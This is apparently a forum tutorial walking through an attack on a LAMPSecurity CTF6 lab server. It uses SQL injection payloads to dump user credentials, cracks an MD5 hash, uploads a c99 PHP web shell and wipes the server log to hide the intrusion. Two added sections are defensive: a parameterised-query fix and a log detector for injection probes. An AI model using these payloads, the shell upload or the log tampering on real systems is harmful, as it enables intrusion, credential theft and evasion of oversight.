Hi All,
In this tutorial we will be rooting a vulnerable web server using the Mantra Security Toolkit.
What you need
1. Mantra Security Toolkit - Download
2. A vulnerable website. I'm using a modified version of LAMPSecurity CTF6
3. Any PHP shell you are comfortable with
- Google for "c99 shell"
Now the process
Step 1:
I'm on the home page of the website now
Code:
```
http://192.168.132.128/
```
Step 2:
I went through all the pages of the website and found a page with URL input
Code:
```
http://192.168.132.128/?id=13
```
Step 3:
I launched Hackbar by pressing F9
Step 4:
The power of the single quote. I'm checking whether the website is vulnerable or not by putting a ' at the end of the URL and pressing Execute.
Code:
```
http://192.168.132.128/?id=13'
```
Since the page content is different from the previous one, I can be sure that the web page is vulnerable.
Step 5:
Let's find out the number of tables
Code:
```
http://192.168.132.128/?id=13 order by 1
```
Step 6:
I have to keep on increasing the last number till I see any change in the page. In usual practice it's going to be a tedious task, since there will be hundreds or thousands of tables if not more. But with this tool I can simply press the + button till I see any change on the webpage
Code:
```
http://192.168.132.128/?id=13 order by 7
```
Step 7:
I went up to 7 and no change till now
Code:
```
http://192.168.132.128/?id=13 order by 7
```
Step 8:
I'm on 8 now and I can see the page changed
Code:
```
http://192.168.132.128/?id=13 order by 8
```
Step 9:
Now let's go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT
Step 10:
I provided the number of tables. Since I got a different page on table 8, I can be sure that table 8 does not exist and there are only 7 tables
Step 11:
Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Let's take the number 2
Code:
```
http://192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7
```
Step 12:
I replaced number 2 in the URL with another SQL command; it got executed and the result is displayed on the page
Code:
```
http://192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7
```
The current user is cms_user@localhost
Step 13:
Let's find out the version of the database. I replaced 2 in the URL with the version() command
Code:
```
http://192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,7
```
5.0.45 is the version
Step 14:
Let me list all the tables
Code:
```
http://192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tables
```
From this list I found "user" is an interesting table
Step 15:
Now I listed all the columns and it's a big list
Code:
```
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns
```
Step 16:
I want columns from the table "user" and nothing else
Code:
```
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='user'
```
Step 17:
Let's find the user name
Code:
```
http://192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from user
```
Step 18:
Now, what about the password
Code:
```
http://192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from user
```
It's encrypted
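The bug behind Steps 4 to 18 beside its fix, as an added example that is not from the original post or from LAMPSecurity CTF6: a constructed SQLite stand-in for the site's `?id=` lookup, where the concatenated query errors on `order by 8` and leaks the `user` table through UNION, while the parameterised version does neither. Note that the `order by N` probe actually counts the columns of the original SELECT (7 here), not tables; the table and column names other than `user`, `user_username` and `user_password` are assumed.

```python
import re
import sqlite3

# Constructed in-memory stand-in for the CTF database: a 7-column content
# table (so "order by 7" succeeds and "order by 8" fails, as on the page)
# and a user table with the two columns the tutorial reads. Names assumed.
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE content(id, title, body, c4, c5, c6, c7);
        INSERT INTO content VALUES (13, 'Welcome', 'home page', 0, 0, 0, 0);
        CREATE TABLE user(user_username, user_password);
        INSERT INTO user VALUES ('admin', '<md5 hash placeholder>');
    """)
    return db

def lookup_vulnerable(db, raw_id):
    """The bug: the ?id= value is pasted straight into the SQL text.
    Returns the rows, or None when the database throws, which is the
    "page changed" signal that the quote and order-by probes rely on."""
    sql = "SELECT * FROM content WHERE id=" + raw_id
    try:
        return db.execute(sql).fetchall()
    except sqlite3.Error:
        return None

def lookup_safe(db, raw_id):
    """The fix: validate the shape of the value, then bind it as a
    parameter so the database never parses it as SQL. Anything that is
    not a plain integer is simply 'no rows', with no error to read."""
    if not re.fullmatch(r"[0-9]+", raw_id):
        return []
    return db.execute("SELECT * FROM content WHERE id=?", (int(raw_id),)).fetchall()
```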
Step 19:
Decrypting the password. I copied the MD5 hash, pasted it into Hackbar and went to Encryption > MD5 Menu > Send to > md5.rednoize.com
Step 20:
Voila! I got the password
Step 21:
Finding the login page. It was right in front of me
Step 22:
Logging in with the credentials I have
Step 23:
Greetings!
Step 24:
I'm an admin now. Look at my powers.
Step 25:
Let me add an event
Step 26:
And of course I want to upload a picture
Step 27:
Let's see whether it allows me to upload the shell or not
Step 28:
Now I'm pressing the "Add Event" button
Step 29:
Nice. Looks like it got uploaded
Step 30:
Let's see where the shell got uploaded to
Step 31:
I'm trying to get the default upload location
Step 32:
Looks like I got it
Let me click on the c9shell.php file I just uploaded
Step 33:
Voila. I have shell access
Step 34:
I simply clicked on the Up button to get to the root folder
Now I can do whatever I wish: deface the website, maintain access or whatever. But that's out of the scope of the current tutorial
Step 35:
What I'm interested in is the log folder
Step 36:
I clicked on the log.log file and it has the logs of my noisy SQL injection attacks
Step 37:
Let me go back and edit the log file
Step 38:
I deleted all the log entries. Now saving it.
Step 39:
Nice. The log file is empty now
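Steps 36 to 39 show why a web server's own log file is not evidence a defender can rely on once someone holds a shell on the box: the whole probing sequence was recorded and then wiped. As an added example that is not from the original post, here is a small detector run over constructed Apache-style access-log lines replaying the walkthrough's requests (client IPs and timestamps are made up); the reason to ship such logs to a separate host in real time is that this kind of check still sees the activity after log.log on the web server is emptied.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined-log style, replaying the
# requests from the walkthrough. IPs and timestamps are invented.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2012:10:00:00 +0000] "GET /?id=13 HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2012:10:00:05 +0000] "GET /?id=13' HTTP/1.1" 200 812
10.0.0.5 - - [01/Jan/2012:10:00:09 +0000] "GET /?id=13%20order%20by%201 HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2012:10:00:20 +0000] "GET /?id=13%20order%20by%208 HTTP/1.1" 200 812
10.0.0.5 - - [01/Jan/2012:10:00:31 +0000] "GET /?id=13%20UNION%20SELECT%201,table_name,3,4,5,6,7%20from%20information_schema.tables HTTP/1.1" 200 9930
10.0.0.9 - - [01/Jan/2012:10:01:00 +0000] "GET /?id=42 HTTP/1.1" 200 4870
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

# Each signature corresponds to one stage of the walkthrough above.
SIGNATURES = [
    ("quote_probe", re.compile(r"['\"]")),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\b.*\bselect\b", re.I)),
    ("schema_enum", re.compile(r"information_schema", re.I)),
]

def scan_line(line):
    """Return (client_ip, [signature names]) for one log line, or None
    if the line does not parse as an access-log record."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # Match against the decoded query-string values rather than the raw
    # target, so %20 / %27 encoding does not hide the payload.
    query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
    values = [v for vs in query.values() for v in vs]
    hits = [name for name, rx in SIGNATURES if any(rx.search(v) for v in values)]
    return m["ip"], hits

def scan_log(text):
    """Aggregate distinct signatures per client IP. One source tripping
    several of them in a short window is the pattern of manual probing."""
    per_ip = {}
    for line in text.splitlines():
        parsed = scan_line(line)
        if parsed and parsed[1]:
            per_ip.setdefault(parsed[0], set()).update(parsed[1])
    return {ip: sorted(sigs) for ip, sigs in per_ip.items()}
```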
Step 40:
Now let's remove the c99 shell by pressing Self Remove
Step 41:
Confirmed!
Step 42:
OK. Goodbye C99
Step 43:
Well. It deleted itself
Reference:
1. Infond tutorial
Happy Hacking!
======================================================================
Note: This tutorial is only for educational purposes. I do not take any responsibility for any misuse; you will be solely responsible for any misuse that you do. Scanning servers and web hacking is criminal activity and is punishable under cyber crime law, and you may get up to 40 years of imprisonment if you get caught doing so.
